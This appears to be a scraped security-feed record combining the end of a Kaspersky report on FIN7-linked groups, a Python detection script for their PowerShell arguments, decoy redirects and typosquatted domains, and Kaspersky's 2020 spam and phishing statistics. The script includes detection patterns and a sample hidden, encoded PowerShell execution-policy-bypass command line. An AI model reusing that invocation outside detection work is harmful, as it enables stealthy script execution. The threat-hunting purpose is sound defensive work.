Since the beginning of 2019, we have collected more than 1,300 samples and extracted more than 130 C2s.\n\nTo deliver their malware, the cybercriminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting a known vulnerability such as CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. Interestingly, in some emails they ask targets to phone them if they have any questions, as FIN7 does.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144536/sas-fin-7-4.png>)\n\nExample of AveMaria spearphishing emails. Criminals suggest calling them.\n\nDuring the investigation into FIN7, our threat-hunting systems found an interesting overlap between the infrastructure of FIN7 and AveMaria. Two servers in the same IP range and autonomous system (AS14576) both expose SSH on the non-standard port 222. One of the servers is a GRIFFON C2, and the other one, an AveMaria C2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144550/sas-fin-7-5.png>)\n\nDistribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. 
Most AveMaria targets (72%) were in the EU.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144612/sas-fin-7-6.png>)\n\n### **CopyPaste**\n\nAt the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity from a previously unknown actor that we temporarily called \"CopyPaste\". Interestingly, this actor targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center.\n\nThis set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim's networks and avoid detection.\n\nHere are the main similarities between CopyPaste and FIN7:\n\n * Both used the same PowerShell argument order: \"powershell.exe -NoP -NonI -ExecutionPolicy Bypass\". We have only seen FIN7 and CopyPaste use this argument list for executing their malicious PowerShell scripts.\n * Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digicert and Microsoft websites and used decoy job and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2019, and Cobalt, on its staging servers, similar to CopyPaste.\n * Quite recently, FIN7 threat actors typosquatted the brand \"Digicert\" using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as Powershell Empire C2s with decoy HTTP 302 redirects to the legitimate Digicert website.\n\nThe links between CopyPaste and FIN7 are still very weak. 
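The three overlaps listed above can each be turned into a narrow hunting check. The following is an added example written for this page, not code from the original post or from any vendor's detection content: it matches the PowerShell argument order on process command lines, the decoy-302 response shape described for the GRIFFON C2s (redirects to Google) and for CopyPaste's Empire servers (redirects to Digicert and Microsoft), and brand typosquatting in C2 domains given in the report's defanged `[.]` form. The command lines, HTTP responses, domain list and brand list are constructed or assumed for the example.

```python
"""Three narrow hunting heuristics drawn from the FIN7 / CopyPaste overlaps."""
import re
from typing import Dict, Optional, Tuple

# ---- 1. PowerShell argument order ------------------------------------------
# The overlap is the exact sequence "-NoP -NonI -ExecutionPolicy Bypass".
# Match the order case-insensitively; whatever follows (-enc blob, -File)
# is irrelevant to the heuristic.
PS_ARG_ORDER = re.compile(
    r"\bpowershell(?:\.exe)?\s+-nop\s+-noni\s+-executionpolicy\s+bypass\b", re.I)


def fin7_style_powershell(cmdline: str) -> bool:
    """True if a process command line carries the FIN7/CopyPaste argument order."""
    return PS_ARG_ORDER.search(cmdline) is not None


# ---- 2. Decoy 302 redirect --------------------------------------------------
# Assumed list of brands the decoys point at (Google for GRIFFON, Digicert and
# Microsoft for CopyPaste's Empire C2s); extend from your own observations.
DECOY_TARGETS = ("google.com", "digicert.com", "microsoft.com")


def parse_http_head(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status code, lower-cased header map)."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    code = int(status_line.split()[1])
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, headers


def is_decoy_redirect(raw: str, targets=DECOY_TARGETS) -> bool:
    """302, explicitly empty body, Location on a big-brand host: the C2 decoy shape."""
    code, h = parse_http_head(raw)
    if code != 302 or h.get("content-length") != "0":
        return False
    m = re.match(r"https?://([^/:?#]+)", h.get("location", ""))
    if not m:
        return False
    host = m.group(1).lower()
    return any(host == t or host.endswith("." + t) for t in targets)


# ---- 3. Brand typosquatting in C2 domains -----------------------------------
BRANDS = ("digicert", "microsoft", "google", "cloudflare", "logitech")  # assumed


def refang(domain: str) -> str:
    """Turn the report's defanged form (digicert-cdn[.]com) back into a hostname."""
    return domain.replace("[.]", ".").strip().lower()


def typosquatted_brand(domain: str, brands=BRANDS) -> Optional[str]:
    """Return the brand a second-level label impersonates, or None.

    digicert-cdn, digicertweb and digi-cert all embed the brand inside a label
    that is not the brand itself; digicert.com and cloud.google.com do not.
    """
    labels = refang(domain).split(".")
    if len(labels) < 2:
        return None
    sld = labels[-2]
    squashed = sld.replace("-", "")
    for brand in brands:
        if brand in squashed and sld != brand:
            return brand
    return None


# ---- Constructed samples (not real telemetry) ------------------------------
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -W Hidden -enc SQBFAFgA",
    r"powershell.exe -ExecutionPolicy Bypass -NoP -NonI -File C:\scripts\inv.ps1",
    "powershell.exe -NoProfile -Command Get-Process",
]
SAMPLE_C2_RESPONSE = (
    "HTTP/1.1 302 Found\r\nServer: nginx\r\nDate: Tue, 11 Dec 2018 09:15:00 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\nContent-Length: 0\r\n"
    "Connection: keep-alive\r\nLocation: https://cloud.google.com/cdn/\r\n\r\n"
)
SAMPLE_BENIGN_RESPONSE = (
    "HTTP/1.1 302 Found\r\nServer: nginx\r\nContent-Length: 178\r\n"
    "Location: https://example.com/login\r\n\r\n<html>moved</html>"
)


def triage(cmdlines, responses, domains) -> Dict[str, list]:
    """Run all three heuristics and return only the hits, keyed by heuristic."""
    return {
        "powershell": [c for c in cmdlines if fin7_style_powershell(c)],
        "decoy_302": [r.split("\r\n", 1)[0] for r in responses if is_decoy_redirect(r)],
        "typosquat": [(d, typosquatted_brand(d)) for d in domains if typosquatted_brand(d)],
    }


if __name__ == "__main__":
    hits = triage(SAMPLE_CMDLINES, [SAMPLE_C2_RESPONSE, SAMPLE_BENIGN_RESPONSE],
                  ["digicert-cdn[.]com", "digi-cert[.]org", "digicert.com",
                   "somtelnetworks[.]com"])
    for name, found in hits.items():
        print(name, found)
```

All three are pivots, not block rules: an nginx 302 with an empty body to a big-brand host also appears on legitimate redirectors, so a hit is a reason to enrich the host (WHOIS overlap, certificate, an SSH listener on port 222) rather than to alert on its own, and the text itself notes the GRIFFON operators changed their landing page in January 2019 once the heuristic became public. The argument-order match is a brittle string the actor can reorder at will and is best scoped with parent-process context (an Office process spawning it). The typosquat check is a substring test on the second-level label, so letter-drop variants such as googl-analytic[.]com from the IOC list are deliberately outside its reach.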
It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.\n\n## **Conclusions**\n\nDuring 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader would have an impact on the group's operations. However, recent data seems to indicate that the attacks have continued without significant setbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.\n\nThe first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on the GRIFFON JScript backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.\n\nWe link the AveMaria botnet to these two groups with medium confidence: AveMaria's targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7's. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.\n\nAll of the aforementioned groups greatly benefit from unpatched systems in corporate environments. 
They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company "Combi Security", we are confident that they continue to create new personas for use in either targeting or recruiting under a "new" brand, "IPC".

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

## Indicators of compromise

#### AveMaria

#### CopyPaste

#### FIN7/GRIFFON

#### EmpireMonkey/CobaltGoblin

_In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names._

", "cvss3": {}, "published": "2019-05-08T10:00:04", "type": "securelist", "title": "FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-05-08T10:00:04", "id": "SECURELIST:163368D119719D834280EA969EDB785D", "href": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-18T10:30:48", "description": "

## Figures of the year

In 2020:

 * The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.
 * Most spam (21.27%) originated in Russia.
 * Kaspersky solutions detected a total of 184,435,643 malicious attachments.
 * The email antivirus was triggered most frequently by email messages containing members of the [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) malware family.
 * The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.
 * The most frequent targets of phishing attacks were online stores (18.12%).

## Trends of the year

### Contact us to lose your money or account!

In their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them.
Various pretexts were given for requesting the user to get in touch with "support": order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was asked to call a support number stated in the email. Most legitimate messages constantly warn recipients of the dangers of opening links that arrive by email; an offer to call back was meant to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use them. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than look for a contact number or wait for a written response from support.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09145859/2020_spam_report_ru_01.png>)

The contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting on the visitor turning their attention to the number and the unsettling warning message against the red background, rather than to the address bar of the fake website.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150200/2020_spam_report_02.png>)

We assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.

### Reputation, bitcoins or your life?

In 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening consequences for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos.
In a reflection of the current trend for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of "Nigerian" scammers, who pose as real political figures or their relatives, offering huge sums of money, or otherwise link their messages to current global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/10122307/2020_spam_report_es_03.png>)

This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company's reputation even more, should it fail to pay up, by stealing confidential information, specifically its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats.
For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or [Turla](<https://securelist.com/tag/turla/>).

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150638/2020_spam_report_04.png>)

The senders of an email that talked about a bomb planted in the company's offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the "attack": an intention to detonate the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150700/2020_spam_report_05.png>)

### Attacks on the corporate sector

Theft of work accounts and infection of office computers with malware in [targeted attacks](<https://encyclopedia.kaspersky.com/glossary/targeted-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) were the main risks that companies faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient's corporate email account.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150725/2020_spam_report_06.png>)

Reasons given for asking users to open a link or attachment could be varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages that were designed to look like they belonged to the company under attack. URL parameters including the corporate email address were passed to the fake page with the help of JavaScript.
This resulted in the user seeing a unique page with a pre-filled email address and a design generated to imitate the company's corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150752/2020_spam_report_07.png>)

During this type of attack, scammers began to make broader use of "voice messages". The appearance of the messages imitated business email.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150815/2020_spam_report_08.png>)

The link could lead directly to a phishing site, but there was also a more complex scenario, in which the linked page looked like an audio player. When the recipient tried to play the file, they were asked to enter the credentials for their corporate mailbox.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150842/2020_spam_report_09.png>)

Demand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. One distinctive feature, which should have alarmed the recipients of the fake invitations, was the details that the page asked them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages, which contained fields for entering the login and password for a work account.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150908/2020_spam_report_10.png>)

### Messengers targeted

Scammers who had been spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them.
The phishing web page contained a tempting message about a money prize, award or other equally desirable surprises.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150934/2020_spam_report_11.png>)

The recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. The victim thus became a link in the spam chain, and because subsequent messages were sent from a trusted address, they avoided anti-spam filters.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151012/2020_spam_report_12.png>)

Besides that, a message from someone that the recipient knew would have much more credibility. Thus, the chain continued to grow, and the scammers went on enriching themselves. After all, even if the victim did fulfill the conditions, getting the promised prize proved not so simple, as the "lucky" recipient was urged to pay a bank commission.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151040/2020_spam_report_13.png>)

### COVID-19

#### "Public relief" by spammers

Many governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals' schemes.

Messages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well.
Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151111/2020_spam_report_14.png>)

Cybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151347/2020_spam_report_16.png>)

However, offers of tax deductions and compensation hid not just the danger of losing money but of losing one's account to the scammers, too, as many of the messages contained phishing links.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151415/2020_spam_report_17.png>)

#### Malicious links

Email campaigns that promised compensation could also threaten computer security. Messages in Turkish, just like those mentioned earlier, offered a payout from Turkey's Ministry of Health – not always mentioned by name – but getting the money required downloading and installing an APK file on the recipient's smartphone. The attack targeted Android users, and the downloadable application contained a copy of [Trojan-Dropper.AndroidOS.Hqwar.cf](<https://threats.kaspersky.com/en/threat/Trojan-Dropper.AndroidOS.Hqwar/>).

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151443/2020_spam_report_18.png>)

A fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message appeared to have been sent by a well-known organization.
Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>), and in the one written in Italian, [Trojan-Downloader.MSOffice.Agent.gen](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>).

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151520/2020_spam_report_19.png>)

#### Viral postal services

COVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of [HEUR:Trojan.Java.Agent.gen](<https://threats.kaspersky.com/en/threat/Trojan.Java.Agent/>).

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151550/2020_spam_report_20.png>)

#### The corporate sector

Spam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on a different kind of trick. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks.
The link opened a phishing page disguised as the Outlook web interface.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151659/2020_spam_report_21.png>)

In another instance, scammers were sending copies of [HEUR:Trojan-PSW.MSIL.Agensla.gen](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) as an email attachment. The scammers explained that the recipient needed to open the attached file because the previous employee, who was supposed to send the "documentation", had quit over COVID-19, and the papers had to be processed within three days.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151724/2020_spam_report_22.png>)

#### "Nigerian" crooks making money from the pandemic

Email from ["Nigerian" scammers](<https://encyclopedia.kaspersky.com/glossary/419-scam/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient's email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensation were generally sent out in a variety of languages.
Messages from some lucky individuals who had won a huge sum and wished to support their fellow human beings in the difficult times of the pandemic were another variation on the "Nigerian" scam.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151841/2020_spam_report_23.png>)

Where messages were signed as being from a lawyer trying to find a new owner for unclaimed capital, the sender emphasized that the late owner of the fortune had died of COVID-19.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151909/2020_spam_report_24.png>)

### An unusual turn of events

Regular "Nigerian" scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter's effort to collect postcards from around the world. The key point of these messages is to get the potential victim to reply: the "mother's" request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them a share of a large sum of money in exchange for a small upfront fee.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151937/2020_spam_report_25.png>)

"Nigerian" scammers are not the only ones that have been getting creative. Spammers who sent out their messages [through website feedback forms](<https://www.kaspersky.com/blog/contact-form-spam/27880/>) employed yet another unusual trick.
The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09152003/2020_spam_report_26.png>)

The deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible, while pondering the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with users reporting that they immediately tried checking what photographs they had "stolen". The links were not functional at the time the "complaints" were discovered, but in all likelihood, they had previously led to malicious files or phishing programs.

## Statistics: spam

### Proportion of spam in email traffic

The share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.

_Proportion of spam in global email traffic, 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160317/01-en-spam-report-2020.png>))_

The percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%) in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.

### Sources of spam by country

The group of ten countries where the largest volumes of spam originated went through noticeable changes in 2020. The United States and China, which had shared first and second places (10.47% and 6.21%, respectively) in the previous three years, dropped to third and fourth.
The "leader" was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 percentage points ahead of the United States.

_Sources of spam by country in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160358/03-en-spam-report-2020.png>))_

France gained 2.97 p.p. as compared to 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sank to seventh place with 3.26%. The other countries in last year's "top ten", India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which jumped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).

### Malicious email attachments

_Attacks blocked by the email antivirus in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160429/04-en-spam-report-2020.png>))_

In 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, came in March, while December was the quietest month, with 11,971,944 malicious attachments, as it had been in 2019.

#### Malware families

_TOP 10 malware families in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160458/05-en-spam-report-2020.png>))_

Members of the [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family was second with 7.70%.
It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.

Equation Editor vulnerability exploits, [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>), dropped to third place with 6.55%. This family had topped the ranking of malware spread through spam in the previous two years.

[Trojan.MSOffice.SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script, which runs PowerShell to secretly download other malware.

In fifth place, with 2.66%, were [Backdoor.Win32.Androm](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>) modular backdoors, which, too, are frequently utilized for delivering other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The [Worm.Win32.WBVB](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: [Trojan.Win32.Kryptik](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Kryptik/>) trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while [Trojan.MSIL.Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.

_TOP 10 malicious email attachments in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160528/06-en-spam-report-2020.png>))_

The rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences.
For instance, our solutions detected the exploit that targeted the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, switched positions, too. Androm-family backdoors missed the "top ten" entirely, but Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the families rankings, was tenth.

### Countries targeted by malicious mailshots

Spain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result, Germany, which had topped the rankings since 2015, dropped to second place with 7.28%, and Russia, with 6.29%, to third.

_Countries targeted by malicious mailshots in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160559/07-en-spam-report-2020.png>))_

Italy's share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, with 2.34%, landed in eleventh place last year.

## Statistics: phishing

In 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019.
A total of 13.21% of Kaspersky users worldwide were attacked, with 6,700,797 masks describing new phishing websites added to the system database.

### Attack geography

In 2020, Brazil regained its lead by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.

_Geography of phishing attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160628/08-en-spam-report-2020.png>))_

#### TOP 10 countries by number of attacked users

The countries with the largest numbers of attempts at opening phishing websites in 2018 "topped the rankings" again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries' indicators dropped remarkably from 2019, Brazil "losing" 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten "leaders" since 2015, was in third place with 17.90%.

Venezuela, last year's "leader", had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.

| Country | Share of attacked users (%)* |
|---|---|
| Brazil | 19.94 |
| Portugal | 19.73 |
| France | 17.90 |
| Tunisia | 17.62 |
| French Guiana | 17.60 |
| Qatar | 17.35 |
| Cameroon | 17.32 |
| Venezuela | 16.84 |
| Nepal | 16.72 |
| Australia | 16.59 |

_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020_

### Top-level domains

Most scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the "top ten" are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, with Germany's .de (1.23%) and Great Britain's .co.uk (1.20%) in fourth and fifth places, respectively.
In sixth place was the Indian domain extension .in, with 1.10%, followed by France's .fr with 1.08%, and Italy's .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.

_Most frequent top-level domains for phishing pages in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160706/09-en-spam-report-2020.png>))_

### Organizations under attack

_The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab's Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

Last year's events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a "modest" 10.72%.

Online games and government and taxes dropped out of the "top ten" in 2020. They were replaced by delivery companies and financial services.

_Distribution of organizations targeted by phishers, by category in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160754/10-en-spam-report-2020.png>))_

## Conclusion

